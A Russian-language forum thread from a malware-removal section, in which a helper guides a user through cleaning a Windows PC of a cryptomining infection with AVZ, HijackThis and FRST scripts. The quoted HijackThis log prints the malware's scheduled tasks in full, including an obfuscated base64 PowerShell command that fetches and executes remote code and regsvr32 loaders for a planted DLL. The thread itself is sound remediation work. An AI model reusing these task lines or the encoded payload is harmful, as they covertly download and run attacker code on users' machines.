Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Сервер регистрации Microsoft грузит процессор. (http://forum.oszone.net/showthread.php?t=333298)

tomclar 20-02-2018 14:20 2799127
Сервер регистрации Microsoft грузит процессор.
 
Вложений: 1
Здравствуйте! В системе постоянно запускается regsvr32.exe и грузит проц.
Начал читать тему http://forum.oszone.net/thread-332245-2.html , но там написано, что инструкции пишутся индивидуально. Если это как-то поможет: то проблема, кажется, появилась после установки программы для майнинга "Kryptex", хотел попробовать, что это такое. Программу удалил, но эта фигня постоянно запускается. Пробовал сканировать 360TS а также очистил всё, что нашёл adwcleaner, но не помогло.

akok 20-02-2018 16:15 2799165
Прокси сами настраивали?
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyServer] = 173.212.202.65:80 (disabled)
R1 - HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies: (default) = 1163.172.220.221:8888


Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\PROGRA~3\10acb4e4\2df70657.dll','');
 DeleteFile('C:\PROGRA~3\10acb4e4\2df70657.dll','32');
 ExecuteFile('schtasks.exe', '/delete /TN "{0C0B7A47-0D0E-0D79-7F11-0E080A051179}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{F7021E1C-2469-EF38-13AF-A44D7DF2DE14}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "000137E8-52F5-89BA-D86F-91C07B8ED848" /F', 0, 15000, true);
 ExecuteRepair(1);
 RebootWindows(true);
  BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176
O22 - Task: 000137E8-52F5-89BA-D86F-91C07B8ED848 - C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/32416c8d1fa3a497 /q" "C:\Users\User\AppData\Local\FFFD37~1\{2DF70~1."
O22 - Task: {0C0B7A47-0D0E-0D79-7F11-0E080A051179} - C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgADsAIAAgADsAOwA7ACAAOwAgADsAOwAgACAAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABZAEoASQBFAFIAUgBEAFoAQwBFAF8ASwBFAEgAUABaAFkAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQA7AH0AOwB9AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAWQBKAEkARQBSAFIARABaAEMARQBfAEsARQBIAFAAWgBZAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAB0AGEAcwBrAGUAbgBnAC4AZQB4AGUAIgApADsACgAkAHMAdQByAGwAPQAiAGgAdAB0AHAAOgAvAC8AYgByAGkAZwBoAHQAYwBoAGkAZQBmAC4AYwBvAG0ALwB1AC8APwBhAD0ATQBiADUASQA0AEsAagBDAGEAWgBIAHAAWgBEADMAegBoAE4AWQBQAEgAeQA2AGQASwBEAEgAOABWAGcATwAzAGIASgB3AEQATgBOAGsAQQBuAHkAeQBMAE0ATgBJAGIAaQBJADEAVwBoAFMAZgB0AHoARQAtAFIAUgB3ADQATwB4AFcAZAA1AF8AbQBCAFUATwA0AGsALQBJAHEAVQB1AHoAMwA0AFEAMwBlAEEAUwBPAF8AbQBjAHYARQB2ADEAcwBNAHcAWABkAHgAcQAzADYAcwB6AHgARwBQAC0ASwB6AGYAbABOAGMAcAB3AGEAZwA2AGkAZgBRAGIANAA1AEEAUgBjAFoAWQBNAE0ARQBuAFkAdQBfAGYAQQBSAHMAdABHAFMAOQBHAE0ASwBhAHgAVwBWAGQATgBCAHMAQwBfAC0AbQBiAFgAegBTADAANwBKADIAeABjAGcANgBHAHEAcwBPAEEAawBGADMAawBZAHMAcABYAEwAYQBaAHAAcwBfAHMAUgB3AFMAegBKAEYAeABzADgAZABMAEwAMABsAGMATQBFAHIAQgB5AHcAXwBkAC0AYQBNAEgAOQBtADcAVgBRAG8AeQA5AEEAZQAtAG0AeAA0AHMAYwBjAGUAawA1AGwAOQBHAHkANQA4ADMAXwBkAGwAOAA2AFkAXwBNAEkAdgAxAE0AbwBJAHkAUgB6AFEASABtAGcAZgBlAHYAVQBkADYATABQAHoASgBEAHUANABSAFcAZwBVAFoAOQBYAHgAdwBsAGEASgBGADEARQBVAEEAegBDAFQATwBFAE8ANAA0AFkAagBtAGwATABEADEATgBCAEYAVwB0ADcAWgBZAHAAYgA1AGkAeQByADYAeQBIAHAAQwBZAGEAeQB2AEsAVQBBAHIATgBIAHkAVABFAE4AYwAyAEgATwB2ADkAaABZAGEATgB0AE8ASABxAGwAUABYAFEAYgBhADUAdwBtAEMAcQBaAFUATQAwAHIAaABrAHAAYQB6AEkARABLAEMAcABQADgAMwA3AFoAawA2AFIASABnAEgAMQBBAEUAUwA4AFMAbwB5AEYAYgBuAFkAcQBVADMAUgBnAGYAbQB3AEUAXwB2AHkAcQBEAGwAYwB2AGgANgBjAG0AQQB0AHkAMgBnADEALQB0AEkATAB3AEwAYgBXAFgATABFAE8AMABCADIAdABPADUAZABUAGIAUQByAGQANABsAG8AbwBJAHMAMQBCAEMATgBYAHQAOQBqAHAAZQByAEwAOABWAGYAdwBIAHQARwBxAFMANAByAHMAdABXAHYAVQA5AFYAQwB1AHgANQBYAGgAcQBjADAAUQAzAEkANABkAG0ATQBZAHUAeABXAE0AQQAxADkAbgBCADgANABxAEsAZQA1AGgARABtAFYAVAB1AFgAQwAzAHIAUwBpAGQAQgBGADIAUgBvAGsAbAA2AE8AdABSAFIAMgBYAGUAXwBkAGgAeABHAHAAYgA2AGEAMQBfAEMAZgBkAE8AbwBJAFEASwB2AG8AdgA4AHIAZQBpAGsAbQBhAE8AVgBLAEoAcgBTAG8AUQAyAHgAbQBzAHAAXwB4AHkAYgBSAG0AeABBAEsATwBuAGEAMABYAHUAZwBRAHcAbABaAEcAOABPAFcAUgBhAFcAYgB0AHgAVQBaAEUAOABLAEcAYQBJAFEAdgBjADQAYgAxADIAaQBzAC0AZAA1ADcAeABXAGQAdQBzAGsAZQBkAGIAbwBiAHYAdQBzAG8AVQB5AFQAQQBKAHEAYgBCADAAVgA4AFoAUABVAGkAQgBEAFEAdgBGAHQAZQBhAHUAbQA3AE8AQgA5AGIATABrAGkAdQBRAC0AaABIAEkAbgBNAG8AMgBTAFMARABMAGYAOABxADMAYwBPAG8AVAB1AFgAQwBqAHQAbABXAEYAdgBRAHcAYgBsADAAcQB5ADIAVQBWAG0AYQBHAFoAYgBaAFUAVABGAHQAeABuAHIAVgBTAG0AcQAwAG8ASQBiAEkAVgBWAHYAMQBBAE8AdgBGAHEAcgBnADcAWAB0AGwAegBKAHIASQBYAFcAUQBHAGIAaQA0AEEAUQBDAFEAeABxAHAAcgByAGgAYQBBAFkAZQBYAGsAYQBFAEQAQwBiADIAdwAtAFcAVgBuAE0ASwBLAHgARgBvAEMAeAA0ADgAOQBRADQATQAwAG0ARQAwAFkAZwBOAGEAegBZAHQAOAAwAHMAQwA1AHoANABlAHMAXwB3ADIANAB6AFAATAB3AEIAbQBuAFYASgBkAF8AUQA0AHkAYgA3AEEAMgBUADgARwA2AEsAOQBfAGcAdgA0AG4AeABWAG0AMQBnAEMAWABsAC0AOAB4AFYAVgBuAFMAbQB2AHgAXwA2AEMAaABGAEMANwByAE0AMQBKAFcASABZADQAUABoAGsAUABmAGcAUgBXAEYASQA4AHkANgBkAFUALQBOAGEAdQAyAGwAbQBOAHMATQA5AEIAbQBWADMAVABrADYAUwBhAFoARwBKAFcAVgB1AGMAMABHAHAAbgBNAEcARAA5ADYAcgBzAGEAcAAtAFAAJgBjAD0ARwBkAHQAbABvAGoAQQByAHgAbwB6ADAATwBQAEMAWABwAFkAeAB2ADIAZABMAHcATgB5AG4ARQBZAHQASABCAHkAMgBmAGsAMQAzAG8AMQAzAFUAZwBfADAARQBXAFIATwBNAEwAdQBKAEcAeQBaAGsANABYAFcAOQA1ADcAdwBjAFoAQQA1AC0ASwBpAE0ASgBMAFMAdgAxAFQAdABUAEMALQAtAFMARgByADQAYwB2ADAAQQBfAGsAcwAwAHYAaABPAFEAeQBGAGUAWAB5AGgATwAzAGUANgByAEkAdwB6AFIATQBjAFgAcAB3ADYASABtAGkAbAB5AHAAegBFAFoAeQBsAHgAbABfADUATQA3ADYAcwBxAE0AUQBIAGsAZgBDAHgAawBvAC0AQgBqADQATQBoAEgATQBTAFoAMwA5AHEAZABnADEAawBXAGoATQBPAFQAUwBpADMAawBBADUANgBDAEwANQBpAF8AbAA2ADUAQQBtAHoAMwA5AHkAVgBlAFUAagAyAGoAQgBrAGwAOQBFADAAQgBHAF8AUABlAHIATgBNAF8AWQBoAHMAMQBoAEgAbQBoAFcAXwBFAG0AQgA2AHkAOABtAG0ARABDAHYAYwBLAHkAWgBhAEoAUwBjAEwAWgBfAGYANgB0AFkATwBnAFAATgA4ADAAdQBjAFEAdAB1AGkAUABnAHgARABzAG4AMQBNAHgAMQAyAGoAMwBsAFYAZwAxAGkAbABVAHcAdQBuADQAcABjAGQAaQBjAGIAdABpADEAUQBoAGYAeQBuADEAOABHAHIASQAyAEgAdgB4AFMAbQBYAEIANgAxADYAYgBVAEsAQwBBAHcAdABUAGgAeQByADkAXwAyAGcASgBRAEIANwBsADIATwBFADEARgBNAHIAUgAtAHcAZgBjAHkAOAByAFoAcwA5AE0AegByAGoAQQBPAFAAVQByAEQAagA4AEEARAAzAFQAOABLAEMAdgBqAGcAagBjADEAdwBNAGIAWgBWAE8AeQAwAGwAUAB2AHUAVwBPAGoAMgB4AF8ATAB3AEsAVgAzAHAAQQBiAEgAMwBpAHgAYgBaAEgAegBkAGIAYgB4AEIARQBiADQAcQBWADUAYwBwAEcAcQBDAE4AbgBmAFcAdwBOADAARwBCADgAQwBRAHUAUAByAG8AcgBjAGcAYgBqADAAMABsAFUAMQB1ADAAQwBVAG4AdgBvAEwATABiAEEARgBBAG0ANgBkAGgAYgBaAFcAZABNAEYASgA1AGkAUgBtADEAZgBKAHkAZgBuADAAVQBSAEgAcwBpAFIASgBqADkARQB0ADUAVABZAC0AcQBxAEUANgA0AHQAWQBDAGcAcgA1AGoAQwBDAHIAdwBGAFMANABYAGkAMwAwADMAWQByAGEAeQBkAGEAUwBrADcAWQBNAFMAOABjAHQAMQBBAGgAYwBlAFAATABjAGQAdwAwAFUAdQBiAFEAZgAwAFgAZQBGAGIAZgBMAHUASwBlAEEAMQBkAFoAZQBqADAAbABvADMAUgBXAEoAaQBPADQAUAA1AFoAZwBYAGsAbwBhAGYAcgB3ADgANABRAHQAMQBpAG4AWQBCAEIAbABvADQAQgBvAEsAdwBEAEIAbAA4AGQANgBvAG8AMwBkAFIAaABjADcAQwA4AF8ANwBpAHcAbwBZAEcAbgBWAF8ARwBMAC0ASwBsAHEAMwBaADYARQBxADMAUABMADIAMQBaAHYAVgAxADkAUwB2AEEARwAwAFMAWgBYAFMAdQBOAFgAaABPAEIAbgB1ADMAaQBrAHEANwBrAEEAbQByADUAYgBvAGMAOABsAFAAdQBLAGsAQgA1AE4AcwBrAHkAMgBsAEMAMwBkAHMAcwB0AE4AWABsAG0AVwB2AGgAaABOAEsAVABiAGYAcQBtAHQARwBrAEEASgA0ADIANwBBAE4ATwBzAE0AUwB5AGUAUABpAHUAQwB0ADYARwBBAHQAeAA1ADAAMwBSAGUAQwA5ADkAMgByAFQAVgBvADYAQQAtAEwARAAtADQAWABXAFAAUQA4AFcASQBJAHMANwBHAHoARABLAHQAWQB2AHgAOABVAFAAQgBIAEYATABNAHAANQBVAHQAaQBHAG8ANgBaADMANQBhAGYAcgA0AEEAWABLAHQATgBrAGMAWABnADMAbQA0ADQATQBTAGcAJgByAD0AMgAxADIAMQA5ADIAOAA3ADAANQA4ADQAOQA0ADQANgA4ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQwAwAEIANwBBADQANwAtADAARAAwAEUALQAwAEQANwA5AC0ANwBGADEAMQAtADAARQAwADgAMABBADAANQAxADEANwA5AH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFIAVABXAFAAVwBQAFUATgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAWgBUAEYARgBTAFUAVwBUAFQATABCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAFIATwBQAEMAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AEEAUgBPAFAAQwAoAFoAVABGAEYAUwBVAFcAVABUAEwAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
O22 - Task: {F7021E1C-2469-EF38-13AF-A44D7DF2DE14} - C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\10acb4e4\2df70657.dll"
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

tomclar 20-02-2018 18:02 2799189
Вложений: 3
Прокси сам настраивал.
quarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме?
Отчёты отправляю

tomclar 20-02-2018 19:06 2799206
Забыл упомянуть - пофиксил в HijackThis . После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы.

akok 20-02-2018 19:41 2799213
Цитата:
Цитата tomclar
uarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме? »
Не нужно тогда.

Сами политики настраивали?
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\...\Policies\Explorer: []
    GroupPolicy: Restriction <==== ATTENTION
    SearchScopes: HKU\S-1-5-21-4254744389-2531880652-1270121733-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL =
    HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\Software\Classes\.scr: scrfile =>  <==== ATTENTION
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

tomclar 20-02-2018 21:51 2799251
Вложений: 1
Не помню чтобы сам политики настраивал)

akok 20-02-2018 22:21 2799260
Цитата:
Цитата tomclar
Не помню чтобы сам политики настраивал) »
Тогда фиксим
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
    HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
    HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
    HKLM\...\Policies\Explorer: [NoResolveSearch] 1
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Цитата:
Цитата tomclar
После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы. »
Тогда сразу финальные рекомендации
Подготовьте лог лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения


Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.

tomclar 21-02-2018 00:26 2799276
Вложений: 2
Финальные логи. Кажется, проблема решена. Спасибо огромное! Так это был майнинг криптовалюты или амиго какой-нибудь?

akok 21-02-2018 11:25 2799356
Исправляем по возможности
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.125.16299.0 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ FirewallWindows ] --------------------------- (просто включите защиту 360 Total Security)
Отключен доменный профиль Брандмауэра Windows
Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows
-------------------------- [ OtherUtilities ] ----------------------------
7-Zip 16.04 (x64) v.16.04 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
WinRAR 5.31 (32-разрядная) v.5.31.0 Внимание! Скачать обновления
Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 161 v.8.0.1610.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u162-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 54.0.1 (x86 ru) v.54.0.1 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
Ace Stream Media 3.1.16.1 v.3.1.16.1 Внимание! Нежелательное ПО. Описание программы.


Время: 05:47.

Время: 05:47.
© OSzone.net 2001-